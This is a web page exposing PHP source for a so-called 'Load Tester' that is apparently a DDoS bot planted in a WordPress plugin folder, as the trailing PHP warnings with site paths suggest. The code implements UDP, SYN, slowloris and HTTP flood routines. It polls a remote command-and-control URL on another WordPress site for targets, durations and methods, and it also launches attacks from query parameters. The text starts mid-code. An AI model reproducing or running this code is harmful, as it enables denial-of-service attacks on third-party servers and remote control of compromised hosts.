Load Tester - Background Service

) < $end_time) { for ($i = 0; $i < 150; $i++) { $socket = @fsockopen("udp://$host", $port, $errno, $errstr, 1); if ($socket) { fwrite($socket, str_repeat("U", 1024)); fclose($socket); $total_packets++; } } if (rand(0, 100) > 90) { echo "[UDP] Packets sent: " . number_format($total_packets) . "
"; flush(); } usleep(5000); } return $total_packets; } function syn_flood_attack($host, $port, $threads, $duration) { $start_time = microtime(true); $end_time = $start_time + $duration; $total_packets = 0; echo "[SYN] Starting flood on $host:$port with $threads threads
"; flush(); while (microtime(true) < $end_time) { for ($i = 0; $i < $threads; $i++) { $socket = @fsockopen($host, $port, $errno, $errstr, 0.5); if ($socket) { fclose($socket); $total_packets++; } } if (rand(0, 100) > 95) { echo "[SYN] Packets sent: " . number_format($total_packets) . "
"; flush(); } usleep(50000); } return $total_packets; } function slowloris_attack($host, $port, $threads, $duration) { $start_time = microtime(true); $end_time = $start_time + $duration; $connections = []; echo "[SLOW] Starting attack on $host:$port with $threads connections
"; flush(); for ($i = 0; $i < $threads; $i++) { $socket = @fsockopen($host, $port, $errno, $errstr, 2); if ($socket) { $partial_request = "GET /?" . uniqid() . " HTTP/1.1\r\n"; $partial_request .= "Host: " . parse_url($host, PHP_URL_HOST) . "\r\n"; $partial_request .= "User-Agent: " . UserAgentGenerator::generate() . "\r\n"; fwrite($socket, $partial_request); $connections[] = $socket; } } echo "[SLOW] Initialized with " . count($connections) . " connections
"; flush(); while (microtime(true) < $end_time) { foreach ($connections as $socket) { if (rand(0, 100) > 70) { fwrite($socket, "X-" . uniqid() . ": " . str_repeat("A", rand(10, 100)) . "\r\n"); } } if (rand(0, 100) > 95) { echo "[SLOW] Active connections: " . count($connections) . "
"; flush(); } sleep(5); } foreach ($connections as $socket) { @fclose($socket); } return count($connections); } function execute_attack($target, $duration, $threads, $method, $mode = 'NON', $port = 80) { if (ob_get_level()) ob_end_clean(); echo "[ATTACK] Starting: $method on $target for {$duration}s with $threads threads
"; flush(); $start_time = microtime(true); $layer4_methods = [AttackMethods::TCP, AttackMethods::UDP, AttackMethods::SYN, AttackMethods::ACK, AttackMethods::FIN, AttackMethods::RST, AttackMethods::XMAS]; if (in_array($method, $layer4_methods)) { $host = parse_url($target, PHP_URL_HOST) ?: $target; switch($method) { case AttackMethods::TCP: $result = tcp_flood_attack($host, $port, $threads, $duration); echo "[TCP] Completed: " . number_format($result) . " packets
"; break; case AttackMethods::UDP: $result = udp_flood_attack($host, $port, $threads, $duration); echo "[UDP] Completed: " . number_format($result) . " packets
"; break; case AttackMethods::SYN: $result = syn_flood_attack($host, $port, $threads, $duration); echo "[SYN] Completed: " . number_format($result) . " packets
"; break; default: $result = tcp_flood_attack($host, $port, $threads, $duration); echo "[L4] Completed: " . number_format($result) . " packets
"; } } else { execute_http_attack($target, $duration, $threads, $method, $mode); } $elapsed = microtime(true) - $start_time; echo "[ATTACK] Finished in " . round($elapsed, 2) . "s
"; flush(); } function execute_http_attack($target_url, $duration, $threads, $method, $mode = 'NON') { $multi_handles = []; $session_pools = []; $start_time = microtime(true); $end_time = $start_time + $duration; $total_requests = 0; $failed_requests = 0; $num_pools = min(3, ceil($threads / 4000)); $sockets_per_pool = floor($threads / $num_pools); for ($i = 0; $i < $num_pools; $i++) { $multi_handles[$i] = curl_multi_init(); curl_multi_setopt($multi_handles[$i], CURLMOPT_PIPELINING, 3); curl_multi_setopt($multi_handles[$i], CURLMOPT_MAX_HOST_CONNECTIONS, 1000); curl_multi_setopt($multi_handles[$i], CURLMOPT_MAX_TOTAL_CONNECTIONS, 4000); $session_pools[$i] = []; for ($j = 0; $j < $sockets_per_pool; $j++) { $session_id = SessionManager::createSession(); $session_pools[$i][$j] = $session_id; $use_post = false; if ($method == AttackMethods::RUDY || $mode == 'POST' || ($mode == 'MIX' && mt_rand(0, 100) > 60)) { $use_post = true; } $ch = setup_curl_handle($target_url, $session_id, $use_post); curl_multi_add_handle($multi_handles[$i], $ch); } } echo "[HTTP] Initialized $num_pools pools
"; flush(); $last_stats_time = $start_time; $peak_rps = 0; while (microtime(true) < $end_time) { $current_time = microtime(true); for ($i = 0; $i < $num_pools; $i++) { $active = null; curl_multi_exec($multi_handles[$i], $active); while ($info = curl_multi_info_read($multi_handles[$i])) { $ch = $info['handle']; $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if ($http_code != 200 && $http_code != 404 && $http_code != 403) $failed_requests++; curl_multi_remove_handle($multi_handles[$i], $ch); curl_close($ch); $total_requests++; $pool_index = mt_rand(0, $num_pools - 1); $session_index = array_rand($session_pools[$pool_index]); $session_id = $session_pools[$pool_index][$session_index]; $use_post = false; if ($method == AttackMethods::RUDY || $mode == 'POST' || ($mode == 'MIX' && mt_rand(0, 100) > 60)) { $use_post = true; } $new_ch = setup_curl_handle($target_url, $session_id, $use_post); curl_multi_add_handle($multi_handles[$pool_index], $new_ch); } curl_multi_select($multi_handles[$i], 0.001); } if ($current_time - $last_stats_time >= 5) { $elapsed = $current_time - $start_time; $current_rps = round($total_requests / $elapsed); $peak_rps = max($peak_rps, $current_rps); $active_sessions = SessionManager::getActiveSessionsCount(); $mem_usage = round(memory_get_usage(true) / 1024 / 1024, 2); echo "[STATS] RPS: $current_rps | Total: " . number_format($total_requests) . " | Failed: " . number_format($failed_requests) . " | Mem: {$mem_usage}MB
"; flush(); $last_stats_time = $current_time; } usleep(1000); if ($method == AttackMethods::GEYE && mt_rand(0, 100) > 95) { for ($burst = 0; $burst < 50; $burst++) { $session_id = SessionManager::createSession(); $ch = setup_curl_handle($target_url, $session_id, true); curl_multi_add_handle($multi_handles[mt_rand(0, $num_pools - 1)], $ch); $total_requests++; } echo "[GEYE] Burst: 50 POST requests added
"; flush(); } } for ($i = 0; $i < $num_pools; $i++) { $active = null; curl_multi_exec($multi_handles[$i], $active); while ($info = curl_multi_info_read($multi_handles[$i])) { curl_multi_remove_handle($multi_handles[$i], $info['handle']); curl_close($info['handle']); } curl_multi_close($multi_handles[$i]); } $elapsed = microtime(true) - $start_time; $avg_rps = round($total_requests / $elapsed); echo "[HTTP] Completed: Avg RPS: $avg_rps | Total: " . number_format($total_requests) . " | Failed: " . number_format($failed_requests) . "
"; flush(); } function check_api_for_commands() { $api_url = "https://tuvanthienha.vn/wp-content/uploads/2024/03/api.php"; try { $ch = curl_init($api_url); curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 10, CURLOPT_SSL_VERIFYPEER => false ]); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code == 200 && !empty($response)) { if (strpos($response, 'url) && isset($xml->time)) { $target = (string)$xml->url; $time = (int)$xml->time; $wait = (int)$xml->wait; $method = isset($xml->method) ? (string)$xml->method : 'FLOOD'; $conc = isset($xml->conc) ? (int)$xml->conc : 1000; $mode = isset($xml->mode) ? (string)$xml->mode : 'NON'; $port = isset($xml->port) ? (int)$xml->port : 80; echo "[API] Command received: $method on $target for {$time}s
"; echo "[API] Threads: $conc | Mode: $mode
"; flush(); if ($wait > 0) { echo "[API] Waiting $wait seconds...
"; flush(); sleep($wait); } execute_attack($target, $time, $conc, $method, $mode, $port); return true; } } } echo "[API] No commands found
"; flush(); return false; } catch (Exception $e) { echo "[API] Error: " . $e->getMessage() . "
"; flush(); return false; } } // Main execution if (isset($_GET['check'])) { // AJAX check endpoint ob_start(); check_api_for_commands(); $output = ob_get_clean(); echo $output; exit; } if (isset($_GET['type'])) { // Direct API request ob_start(); $type = $_GET['type'] ?? ''; $url = $_GET['url'] ?? ''; $met = $_GET['met'] ?? ''; $conc = intval($_GET['conc'] ?? 1000); $time = intval($_GET['time'] ?? 30); $mode = $_GET['mode'] ?? 'NON'; $port = intval($_GET['port'] ?? 80); if (!empty($url) && !empty($met) && $conc > 0 && $time > 0) { execute_attack($url, $time, $conc, $met, $mode, $port); } else { echo "[ERROR] Invalid parameters
"; } $output = ob_get_clean(); echo $output; exit; } // Main page ?> Load Tester - Background Service

Status: ACTIVE | Next check: 5s

[SYSTEM] Load tester started. Checking for commands every 5 seconds...

Warning: Cannot modify header information - headers already sent by (output started at /home/affworld/public_html/wp-content/plugins/plugin/api.php:249) in /home/affworld/public_html/wp-includes/pluggable.php on line 1531

Warning: Cannot modify header information - headers already sent by (output started at /home/affworld/public_html/wp-content/plugins/plugin/api.php:249) in /home/affworld/public_html/wp-includes/pluggable.php on line 1534